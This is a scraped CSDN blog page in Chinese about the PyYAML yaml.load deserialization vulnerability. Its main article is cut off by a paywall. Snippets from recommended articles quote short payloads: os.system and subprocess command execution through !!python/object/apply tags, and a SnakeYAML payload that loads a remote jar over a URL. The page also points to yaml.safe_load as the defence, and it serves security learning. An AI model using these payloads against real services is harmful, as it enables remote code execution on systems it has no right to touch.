(Python)PyYAML反序列化漏洞

最新推荐文章于 2024-08-07 00:00:00 发布
最新推荐文章于 2024-08-07 00:00:00 发布
阅读量3.5k 收藏 4
点赞数 1
分类专栏: Web安全 漏洞 文章标签: PyYAML反序列化漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ski_12/article/details/85013724
版权
本文介绍了PyYAML反序列化漏洞的基本概念,通过示例代码展示了漏洞利用方式,分析了漏洞根源,并提供了通用payload和检测、防御方法。建议使用yaml.safe_load()避免风险。
摘要由CSDN通过智能技术生成

基本概念

(引用百度)YAML是“YAML不是一种标记语言”的外语缩写;但为了强调这种语言以数据做为中心,而不是以置标语言为重点,而用返璞词重新命名。它是一种直观的能够被电脑识别的数据序列化格式,是一个可读性高并且容易被人类阅读,容易和脚本语言交互,用来表达资料序列的编程语言。

PyYAML是Python中YAML语言的编辑器和解释器。

安装:pip install PyYAML

两个函数:

yaml.dump():将一个Python对象序列化生成为yaml文档。

yaml.load():将一个yaml文档反序列化为一个Python对象。

简单的用例:

可以看到,User对象经过yaml序列化之后内容为一行字符串,简单解释一下:“!!pythonobject”为yaml标签,yaml.load()会识别该标签并调用相应的方法执行反序列化操作;冒号后面的“__main__”为py文件名,这里为本文件的意

最低0.47元/天 解锁文章
Mi1k7ea
关注
专栏目录
Python反序列化
SK1ng的博客
01-22 3039
Python反序列化漏洞 Pickle 序列化:pickle.dumps() 将对象序列化为字符串、pickle.dump() 将对象序列化后的字符串存储为文件 反序列化:pickle.loads() 将字符串反序列化为对象、pickle.load() 从文件中读取数据反序列化 使用dumps() 与 loads() 时可以使用 protocol 参数指定协议版本 协议有0,1,2,3,4,5号版本,不同的 python 版本默认的协议版本不同。这些版本中,0号是最可读的,之后的版本为了优化加入了不可
PyYaml反序列化漏洞详解
2302_76827504的博客
04-27 642
果listitems不为空,则调用instance的extend()方法,将listitems中的所有元素添加到instance列表对象的末尾,instance是我们创建的实例,这里并没有定义listitems是什么,如果我们的listitems是一个字典,而且其内容有"{‘extend’:function}",这样的话,我们就可以利用extend进行任意函数的执行了。在这个方法中,data是一个包含YAML格式字符串的变量,可以是从文件中读取的字符串,也可以是用户输入的字符串等。ddd的值为666。
深入探究Python反序列化漏洞:原理剖析与实战复现
最新发布
2301_80064376的博客
08-07 684
在现代应用程序开发中,Python反序列化漏洞已成为一个备受关注的安全问题。反序列化Python中用于将字节流转换回对象的过程,但如果没有妥善处理,攻击者可以通过精心构造的恶意数据,利用反序列化漏洞执行任意代码,进而控制整个系统。理解Python反序列化漏洞的工作原理,并掌握其复现技巧,对于提升我们的安全防护水平至关重要。本文将深入剖析Python反序列化漏洞的原理,展示如何在实际环境中复现该漏洞,并提供有效的防御措施。无论你是网络安全的新手,还是经验丰富的开发者,都能从中获得宝贵的知识和实用的技能。
Pyyaml-yaml.load反序列化漏洞
huichen1233的博客
08-30 3042
YAML 是 “YAML Ain’t a Markup Language”(YAML 不是一种标记语言)的递归缩写。在开发的这种语言时,YAML 的意思其实是:“Yet Another Markup Language”(仍是一种标记语言)。YAML 的语法和其他高级语言类似,并且可以简单表达清单、散列表,标量等数据形态。它使用空白符号缩进和大量依赖外观的特色,特别适合用来表达或编辑数据结构、各种配置文件、倾印调试内容、文件大纲(例如:许多电子邮件标题格式和YAML非常接近)。blog.yml。...
PyYaml反序列化漏洞
snowlyzz的博客
05-08 1130
pyyaml 反序列化 简洁总结
pyyaml反序列化漏洞
黑面狐
02-14 869
pyyaml在解析含有!!开头的数据会强制进行类型转换成字符串格式。 测试 import yaml yaml.load('!!python/object/apply:os.system ["date"]')   结果 poc还可以 !!python/object/apply:subprocess.check_output [[calc.exe]] !!python/object...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
小白看得懂的MySQL JDBC 反序列化漏洞分析 - 先知社区1
08-03
【MySQL JDBC 反序列化漏洞分析】 MySQL JDBC 反序列化漏洞主要涉及到Java数据库连接(JDBC)驱动程序中的安全问题。JDBC是Java中用于与数据库交互的标准接口,允许开发者使用Java语言执行SQL语句。在特定版本的...
python 对象序列化_序列化Python对象的方法
weixin_39867208的博客
11-29 151
问题你需要将一个Python对象序列化为一个字节流,以便将它保存到一个文件、存储到数据库或者通过网络传输它。解决方案对于序列化最普遍的做法就是使用 pickle 模块。为了将一个对象保存到一个文件中,可以这样做:12345import pickledata= ...# Some Python objectf= open('somefile','wb')pickle.dump(data, f)为了将...
end的学习(Session验证,Python yaml 反序列化,nodejs RCE)
qq_45781155的博客
12-04 362
Session验证用户登录 用户提交包含用户名和密码的表单,发送HTTP请求。 服务器验证用户发来的用户名密码。 如果正确则把当前用户名(通常是用户对象)存储到redis中,并生成它在redis中的ID。 这个ID称为Session ID,通过Session ID可以从Redis中取出对应的用户对象, 敏感数据(比如authed=true)都存储在这个用户对象中。 设置Cookie为sessionId=xxxxxx|checksum并发送HTTP响应, 仍然为每一项Cookie都设置签名。
CTF题型 Python中pickle反序列化进阶利用&例题&opache绕过(1)
2401_84009679的博客
04-12 953
训机构动则几千的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!**
yaml反序列化
u013224189的专栏
11-23 2226
Yaml反序列化 payloads1: !!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["http://127.0.0.1:7800/yaml-payload.jar"] ]] ] payloads2: ​ 绕过 !! 的限制,如下: !可以用 tag:yaml.org,2002 表示。 !<tag:yaml.org,2002:javax.script.Scri
python对象序列化相对安全的方法_序列化Python对象的方法
weixin_29470893的博客
02-10 282
问题你需要将一个python对象序列化为一个字节流,以便将它保存到一个文件、存储到数据库或者通过网络传输它。解决方案对于序列化最普遍的做法就是使用 pickle 模块。为了将一个对象保存到一个文件中,可以这样做:import pickledata = ... # some python objectf = open('somefile', 'wb')pickle.dump(data, f)为了将一...
python 对象序列化 pickling_Python对象序列化与反序列(Pickle)
weixin_39793105的博客
12-20 207
我们最近想要对爬虫拿到的下载结果进行存档,这个结果是一个Python对象(我们并不想简单的存一个HTML或json,想要让整个下载过程可以还原),于是就想到了用Python内置的pickle库(腌黄瓜库),序列化对象成bytes,需要的时候可以反序列化。通过下面的代码可以简单了解pickle的用法和功能。12345678910111213141516171819202122232425262728...
Python PyYAML反序列化漏洞实验和Payload构造
3569
04-24 3460
0x01 概述什么程序存在漏洞:使用了PyYAML这个库并且使用了yaml.load而不是yaml.safe_load函数来解析yaml文件的程序代码审计关键词:import yamlyaml.load(已知相关漏洞:Remote Code Execution Vulnerability in Ansible-Vault Library. (CVE-2017-2809)https://pypi.p...
python对象序列化相对安全的方法_python 的对象序列化/反序列化
weixin_29663861的博客
02-10 174
import marshal,picklelist = [1]list.append(list)print marshal.dumps(list) #出错, 无限制的递归序列化print pickle.dumps(list) #no problempickle的序列化规则Python规范(Python-specific)提供了pickle的序列化规则。这就不必担心不同版本的Python之间序列化兼...
python反序列化漏洞防御
09-13
要防止Python反序列化漏洞,您可以采取以下几种措施: 1. 验证和过滤输入:在反序列化之前,验证和过滤所有传入的数据。确保只接受可信任和预期的数据,并拒绝任何可能包含恶意代码的输入。 2. 使用安全的反序列化...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值